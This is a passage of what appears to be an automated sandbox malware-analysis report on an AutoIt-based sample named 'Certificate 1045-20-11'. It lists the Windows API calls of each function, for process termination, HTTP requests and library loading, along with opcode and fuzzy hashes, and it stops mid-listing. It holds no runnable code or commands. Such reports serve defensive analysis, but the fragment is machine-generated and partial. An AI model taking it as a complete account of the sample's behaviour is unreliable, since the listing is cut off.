                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00887C1D
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00887C2C
                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00887C3B
                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00887C45
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00887C4C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 839392675-0
                                                                                • Opcode ID: 5200c487e46d2c8c41871aac95a5cabcc063e6fe0746e6e7870482a08ee96c8c
                                                                                • Instruction ID: c56475089c80f104e9be80086772ee4f7eec9d9fc50a579adf82e547037a9f16
                                                                                • Opcode Fuzzy Hash: 5200c487e46d2c8c41871aac95a5cabcc063e6fe0746e6e7870482a08ee96c8c
                                                                                • Instruction Fuzzy Hash: 48F03A72241298BBE7216BA29C0EEEFBB7CFFC6B11F000029FA01D1151E7B05A41C6B5
                                                                                Function 00889A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00889A33
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,008B5DEE,?,?,?,?,?,0084ED63), ref: 00889A44
                                                                                • TerminateThread.KERNEL32(?,000001F6,?,?,?,008B5DEE,?,?,?,?,?,0084ED63), ref: 00889A51
                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,008B5DEE,?,?,?,?,?,0084ED63), ref: 00889A5E
                                                                                  • Part of subcall function 008893D1: CloseHandle.KERNEL32(?,?,00889A6B,?,?,?,008B5DEE,?,?,?,?,?,0084ED63), ref: 008893DB
                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00889A71
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,008B5DEE,?,?,?,?,?,0084ED63), ref: 00889A78
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3495660284-0
                                                                                • Opcode ID: 630d26be993376ffa17713605b499ac8fd35ac3af4dce10db94da07c4f78afba
                                                                                • Instruction ID: 38a0c19a1a1a187cb63242f1b836f98e2126dadc283e0065e89c934928586492
                                                                                • Opcode Fuzzy Hash: 630d26be993376ffa17713605b499ac8fd35ac3af4dce10db94da07c4f78afba
                                                                                • Instruction Fuzzy Hash: EBF08232141311ABD7153BA4EC8DDFB7739FF84302B180436F543910A1EB75A801DB50
                                                                                Function 00841CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085F4EA: std::exception::exception.LIBCMT ref: 0085F51E
                                                                                  • Part of subcall function 0085F4EA: __CxxThrowException@8.LIBCMT ref: 0085F533
                                                                                • __swprintf.LIBCMT ref: 00841EA6
                                                                                Strings
                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00841D49
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                • API String ID: 2125237772-557222456
                                                                                • Opcode ID: 8f6a5d70b64fd0820b8a132e555b0cf1c2f96dbb79468c8776ebea1634fa67d7
                                                                                • Instruction ID: 44708ac0b85f8b32fdb821dedf25a4dd35eca6d4166ea0b31e4fc73a7110c102
                                                                                • Opcode Fuzzy Hash: 8f6a5d70b64fd0820b8a132e555b0cf1c2f96dbb79468c8776ebea1634fa67d7
                                                                                • Instruction Fuzzy Hash: 03913A715082099FCB24EF28C895CAAB7E4FF95700F04491DF995D72A2EB70EE45CB92
                                                                                Function 0089AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 0089B006
                                                                                • CharUpperBuffW.USER32(?,?), ref: 0089B115
                                                                                • VariantClear.OLEAUT32(?), ref: 0089B298
                                                                                  • Part of subcall function 00889DC5: VariantInit.OLEAUT32(00000000), ref: 00889E05
                                                                                  • Part of subcall function 00889DC5: VariantCopy.OLEAUT32(?,?), ref: 00889E0E
                                                                                  • Part of subcall function 00889DC5: VariantClear.OLEAUT32(?), ref: 00889E1A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                • API String ID: 4237274167-1221869570
                                                                                • Opcode ID: 52056c3cde10fef3783c85a9e19544b31b90655f7a7f5d7b366db59819c534ff
                                                                                • Instruction ID: 57f16a50866bba0d03b5075ca5ea5a2f94a49df8dd4dfc03145a8d46a968d866
                                                                                • Opcode Fuzzy Hash: 52056c3cde10fef3783c85a9e19544b31b90655f7a7f5d7b366db59819c534ff
                                                                                • Instruction Fuzzy Hash: 80917A306083059FCB10EF68D58595ABBE4FF89704F08486EF89ADB362DB31E945CB52
                                                                                Function 00885347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085C6F4: _wcscpy.LIBCMT ref: 0085C717
                                                                                • _memset.LIBCMT ref: 00885438
                                                                                • GetMenuItemInfoW.USER32(?), ref: 00885467
                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00885513
                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0088553D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                • String ID: 0
                                                                                • API String ID: 4152858687-4108050209
                                                                                • Opcode ID: 031584841430b0fd0a816d84f941c26fc37753903176d308e9653006efff8bbf
                                                                                • Instruction ID: c28536d09635b600aa28b15141630bf85bc18a6d5f023159f3e2815d83b9f517
                                                                                • Opcode Fuzzy Hash: 031584841430b0fd0a816d84f941c26fc37753903176d308e9653006efff8bbf
                                                                                • Instruction Fuzzy Hash: 8B51F1B1604B059BD715BF28C8416ABBBE9FF86364F14062EF895D32D1DBB0CD448B52
                                                                                Function 00880213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0088027B
                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008802B1
                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 008802C2
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00880344
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                • String ID: DllGetClassObject
                                                                                • API String ID: 753597075-1075368562
                                                                                • Opcode ID: 0f963a56429c741c94add6d525bdb52929aa080f2bf7b785011d865f22348bbc
                                                                                • Instruction ID: 9f8f96f8e542a862696c710c207f7ae0d361c524cb10fefb6312e63bc5ba6896
                                                                                • Opcode Fuzzy Hash: 0f963a56429c741c94add6d525bdb52929aa080f2bf7b785011d865f22348bbc
                                                                                • Instruction Fuzzy Hash: 4B415C71600209EFDB55EF64C885BAA7BB9FF44315B1480ADE909DF206D7B1DA48CFA0
                                                                                Function 00885007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00885075
                                                                                • GetMenuItemInfoW.USER32 ref: 00885091
                                                                                • DeleteMenu.USER32(00000004,00000007,00000000), ref: 008850D7
                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00901708,00000000), ref: 00885120
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                • String ID: 0
                                                                                • API String ID: 1173514356-4108050209
                                                                                • Opcode ID: cc36b7e256b8176a35a2741474c4f7b93ee9a867472f5b409cc670dcd08d291a
                                                                                • Instruction ID: 13647bf32e6fe8e0145f66d8942497e6ed0b11f85dc588627f8be6772b469ecb
                                                                                • Opcode Fuzzy Hash: cc36b7e256b8176a35a2741474c4f7b93ee9a867472f5b409cc670dcd08d291a
                                                                                • Instruction Fuzzy Hash: 63418E752047019FD720AF28D884F6ABBE9FF85314F14461EF855D7291D730E904CB62
                                                                                Function 008A0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(?,?,?,?), ref: 008A0587
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharLower
                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                • API String ID: 2358735015-567219261
                                                                                • Opcode ID: b8c22ce3e4b93d65b880757710d1fe5e035d1ac10acfb1108bc763e55e10cd25
                                                                                • Instruction ID: e2e7c3fa10df5c0fe627e008504f00be7ec3eaae2e86a7290809593ee608ccb7
                                                                                • Opcode Fuzzy Hash: b8c22ce3e4b93d65b880757710d1fe5e035d1ac10acfb1108bc763e55e10cd25
                                                                                • Instruction Fuzzy Hash: 1C31B27090021AAFCF04EF68CC419EEB3B4FF65314B00462AE966E76D1DB71E915CB81
                                                                                Function 0087B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0087B88E
                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0087B8A1
                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 0087B8D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: e7a63135623b34d55147b66b0a481d7af3d2fe4a75ed1bdcbb461a19e19215db
                                                                                • Instruction ID: fb774636b2da79435810816fd569d560335840b3753f6be3b3005b535277bc29
                                                                                • Opcode Fuzzy Hash: e7a63135623b34d55147b66b0a481d7af3d2fe4a75ed1bdcbb461a19e19215db
                                                                                • Instruction Fuzzy Hash: DE21E171900208AFDB04AB68C886EBE777DFF05354F108129F569E62E5DB748D0A9762
                                                                                Function 008943E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00894401
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00894427
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00894457
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0089449E
                                                                                  • Part of subcall function 00895052: GetLastError.KERNEL32(?,?,008943CC,00000000,00000000,00000001), ref: 00895067
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                • String ID:
                                                                                • API String ID: 1951874230-3916222277
                                                                                • Opcode ID: d20dc35963b4492fe7386b9bab0c35b8c13c9ec971bb2059226bd383d8191e44
                                                                                • Instruction ID: 8523c83b0ecf4e7db3e16c2ab22f6d3e0aaf319166e29cafb39ca30b6c453be5
                                                                                • Opcode Fuzzy Hash: d20dc35963b4492fe7386b9bab0c35b8c13c9ec971bb2059226bd383d8191e44
                                                                                • Instruction Fuzzy Hash: 7D2180B1501608BEEB11AF54CC85EBFB6FCFB48B58F14902AF109E6140EA748D069775
                                                                                Function 008A90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0085D1BA
                                                                                  • Part of subcall function 0085D17C: GetStockObject.GDI32(00000011), ref: 0085D1CE
                                                                                  • Part of subcall function 0085D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0085D1D8
                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 008A915C
                                                                                • LoadLibraryW.KERNEL32(?), ref: 008A9163
                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 008A9178
                                                                                • DestroyWindow.USER32(?), ref: 008A9180
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                • String ID: SysAnimate32
                                                                                • API String ID: 4146253029-1011021900
                                                                                • Opcode ID: fd0bb5226ecbe34bd94b215a990e2eeeff0bd4345bd2adc36090633e3c333080
                                                                                • Instruction ID: 717af374113289a780934f372e7fbe3ec6ceeceb8819df1955abea5f83024ca4
                                                                                • Opcode Fuzzy Hash: fd0bb5226ecbe34bd94b215a990e2eeeff0bd4345bd2adc36090633e3c333080
                                                                                • Instruction Fuzzy Hash: 1A218E7120420ABBFF204E649C84EBB37A9FB9A364F114628F994D6590D775DC41A7A0
                                                                                Function 00889568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00889588
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008895B9
                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 008895CB
                                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00889605
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandle$FilePipe
                                                                                • String ID: nul
                                                                                • API String ID: 4209266947-2873401336
                                                                                • Opcode ID: 42b74f5bb97dc27a1e3213a599cf2e1f4c9cd1560ec140a106a9a0bd7bdd295c
                                                                                • Instruction ID: 710c2d9af06da9f443672627d72b3f9285ced539eb22430fd797bc94d8b44ebc
                                                                                • Opcode Fuzzy Hash: 42b74f5bb97dc27a1e3213a599cf2e1f4c9cd1560ec140a106a9a0bd7bdd295c
                                                                                • Instruction Fuzzy Hash: FE213D70600309ABDB21AF69DC05AAA77B8FF55724F244A29F9A1D72D0E770ED41CB10
                                                                                Function 00889634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00889653
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00889683
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00889694
                                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008896CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandle$FilePipe
                                                                                • String ID: nul
                                                                                • API String ID: 4209266947-2873401336
                                                                                • Opcode ID: 910f57e2895eb2a25cb3ef985276e9e38d85b2006764e7a764173a9c9ec08431
                                                                                • Instruction ID: 89b606520a1019fd9eb6446636791a2fc842b42c4eab3b244a4ff7ec0a3d5cf7
                                                                                • Opcode Fuzzy Hash: 910f57e2895eb2a25cb3ef985276e9e38d85b2006764e7a764173a9c9ec08431
                                                                                • Instruction Fuzzy Hash: 2F215E716003059BDB20EF699C44EAAB7A8FF65734F280A19F8E1D72D0E770A841CB54
                                                                                Function 0088DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0088DB0A
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0088DB5E
                                                                                • __swprintf.LIBCMT ref: 0088DB77
                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,008DDC00), ref: 0088DBB5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                • String ID: %lu
                                                                                • API String ID: 3164766367-685833217
                                                                                • Opcode ID: 48688610376fe6b2d048c53d720f5da7c479b53fe4c324f5b150613c3aca6705
                                                                                • Instruction ID: d424371696ce39189078b7d8759ee80d8c413ccfc3152da7f7b508dd0a1b572d
                                                                                • Opcode Fuzzy Hash: 48688610376fe6b2d048c53d720f5da7c479b53fe4c324f5b150613c3aca6705
                                                                                • Instruction Fuzzy Hash: 6C218335A00208AFCB10EF69C985EAEBBB8FF49704B044069F509E7351DB70EE01CB61
                                                                                Function 0087C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0087C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0087C84A
                                                                                  • Part of subcall function 0087C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0087C85D
                                                                                  • Part of subcall function 0087C82D: GetCurrentThreadId.KERNEL32 ref: 0087C864
                                                                                  • Part of subcall function 0087C82D: AttachThreadInput.USER32(00000000), ref: 0087C86B
                                                                                • GetFocus.USER32 ref: 0087CA05
                                                                                  • Part of subcall function 0087C876: GetParent.USER32(?), ref: 0087C884
